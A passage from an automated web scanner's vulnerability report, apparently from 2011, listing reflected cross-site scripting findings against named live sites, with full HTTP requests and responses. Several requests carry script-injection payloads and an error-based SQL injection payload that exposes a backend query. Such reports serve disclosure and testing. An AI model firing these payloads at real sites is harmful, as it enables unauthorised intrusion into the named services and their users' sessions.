GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorousd63f1<img%20src%3da%20onerror%3dalert(1)>fdda9b0981e&gn=window.Badges_216861968_1&eu=http%3A//www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html&id=840995&eco=1301155920&ebi2&entry_design=&cb=window.Badges_216861968_1.slicesCallback&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1300987757.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1364029523-1300987777508; __qseg=Q_D|Q_T|Q_2687|Q_2685|Q_2402|Q_1910|Q_1908|Q_1905|Q_1592|Q_683|Q_682|Q_680|Q_679|Q_678|Q_677|Q_676|Q_666|Q_665|Q_660|Q_657; huffpost_adssale=y; s_pers=%20s_getnr%3D1301171811856-Repeat%7C1364243811856%3B%20s_nrgvo%3DRepeat%7C1364243811860%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; huffpo_type_views=%7B%222%22%3A1%7D; __utma=265287574.492257335.1300987757.1300987757.1301171812.2; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.2.10.1301171812

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 20:36:16 GMT
Content-Length: 7560
Connection: close

window.Badges_216861968_1.slicesCallback({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorousd63f1<img src=a onerror=alert(1)>fdda9b0981e"],"global_name":"window.Badges_216861968_1","slice_params":{"facebook_glamorous":{"share_amount":"3,283"},"retweet_glamorous":{"short_url":"http:\/\/huff.to\/hL3Bum","tweet_text":"BREAKING: Geraldine
...[SNIP]...

5.81. http://www.huffingtonpost.com/permalink-tracker.html [vertical parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /permalink-tracker.html

Issue detail

The value of the vertical request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 351ba"%3balert(1)//b9d3a987aa3 was submitted in the vertical parameter. This input was echoed as 351ba";alert(1)//b9d3a987aa3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /permalink-tracker.html?vertical=politics351ba"%3balert(1)//b9d3a987aa3 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1300987757.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1364029523-1300987777508; __qseg=Q_D|Q_T|Q_2687|Q_2685|Q_2402|Q_1910|Q_1908|Q_1905|Q_1592|Q_683|Q_682|Q_680|Q_679|Q_678|Q_677|Q_676|Q_666|Q_665|Q_660|Q_657; huffpost_adssale=y; s_pers=%20s_getnr%3D1301171811856-Repeat%7C1364243811856%3B%20s_nrgvo%3DRepeat%7C1364243811860%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; huffpo_type_views=%7B%222%22%3A1%7D; __utma=265287574.492257335.1300987757.1300987757.1301171812.2; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.6.10.1301171812

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=289
Date: Sat, 26 Mar 2011 20:36:20 GMT
Content-Length: 994
Connection: close

<html>
<head>
<title>Huffit Tracker</title>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=hp_config.js%2Chp_track.js&amp;v44491"></script>
</head>
<body>
   <!-- Con
...[SNIP]...
<script type="text/javascript">
       HPConfig.current_vertical_name = "politics351ba";alert(1)//b9d3a987aa3";
       HPConfig.current_web_address = "www.huffingtonpost.com";
       HPConfig.inst_type = "prod";
       HPConfig.timestamp_for_clearing_js = "1301078667";
   </script>
...[SNIP]...

5.82. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The value of the iusrc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dd63"><script>alert(1)</script>53698cadc19 was submitted in the iusrc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=34dd63"><script>alert(1)</script>53698cadc19 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47863


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<input type="hidden" name="iusrc" value="34dd63"><script>alert(1)</script>53698cadc19 ">
...[SNIP]...

5.83. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6306'%3balert(1)//ea983b03af0 was submitted in the REST URL parameter 2. This input was echoed as b6306';alert(1)//ea983b03af0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ppc/leadflowb6306'%3balert(1)//ea983b03af0/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:23 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5333
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lead_flow_template temps on temps.template_id = prj.templateId
   left join lead_flow_group grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflowb6306';alert(1)//ea983b03af0/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

5.84. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload beb88'%3balert(1)//2d44c5a2fc8 was submitted in the REST URL parameter 3. This input was echoed as beb88';alert(1)//2d44c5a2fc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ppc/leadflow/hins00beb88'%3balert(1)//2d44c5a2fc8/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5333
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lead_flow_template temps on temps.template_id = prj.templateId
   left join lead_flow_group grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/hins00beb88';alert(1)//2d44c5a2fc8/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

5.85. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f34e'%3balert(1)//49eac350b90 was submitted in the REST URL parameter 4. This input was echoed as 5f34e';alert(1)//49eac350b90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ppc/leadflow/hins00/project.php5f34e'%3balert(1)//49eac350b90?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:21:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5333
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lead_flow_template temps on temps.template_id = prj.templateId
   left join lead_flow_group grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/hins00/project.php5f34e';alert(1)//49eac350b90?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

5.86. http://www.insideup.com/ppc/leadflow/hins00/project.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The value of the catId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1ac5'%3balert(1)//63a331a2c77 was submitted in the catId parameter. This input was echoed as e1ac5';alert(1)//63a331a2c77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002e1ac5'%3balert(1)//63a331a2c77&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5333
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lead_flow_template temps on temps.template_id = prj.templateId
   left join lead_flow_group grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002e1ac5';alert(1)//63a331a2c77&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

5.87. http://www.insideup.com/ppc/leadflow/hins00/project.php [iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The value of the iusrc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0cdd"><script>alert(1)</script>6d45ca83c0c was submitted in the iusrc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=f0cdd"><script>alert(1)</script>6d45ca83c0c HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53862


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<input type="hidden" name="iusrc" value="f0cdd"><script>alert(1)</script>6d45ca83c0c ">
...[SNIP]...

5.88. http://www.insideup.com/ppc/leadflow/hins00/project.php [iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The value of the iusrc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77a25'%3balert(1)//b75a0f29006 was submitted in the iusrc parameter. This input was echoed as 77a25';alert(1)//b75a0f29006 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%2777a25'%3balert(1)//b75a0f29006 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:50 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5333
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'77a25';alert(1)//b75a0f29006' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

5.89. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84466'%3balert(1)//201a5427a00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84466';alert(1)//201a5427a00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27&84466'%3balert(1)//201a5427a00=1 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:19:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5363
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&84466';alert(1)//201a5427a00=1' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

5.90. http://www.manitu.de/shop/ [account_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The value of the account_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e0c2"><script>alert(1)</script>e1fa66e6668 was submitted in the account_id parameter. This input was echoed as 6e0c2\"><script>alert(1)</script>e1fa66e6668 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shop/?count_calendar2011=0&count_cup=0&count_ballpen=0&count_keychain=3&count_writingpad_a5=0&count_shipping=1&account_id=6e0c2"><script>alert(1)</script>e1fa66e6668&billc_organization=&billc_sex=&billc_title=&billc_firstname=&billc_lastname=&billc_birthdate=&billc_street1=&billc_street2=&billc_zipcode=&billc_city=&billc_country=DE&billc_phone=&billc_fax=&billc_email=&payment_invoice_type=invoice&payment_invoice_type=email&terms_and_conditions=accepted&right_of_withdrawal=accepted&order=Abschicken HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/shop/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
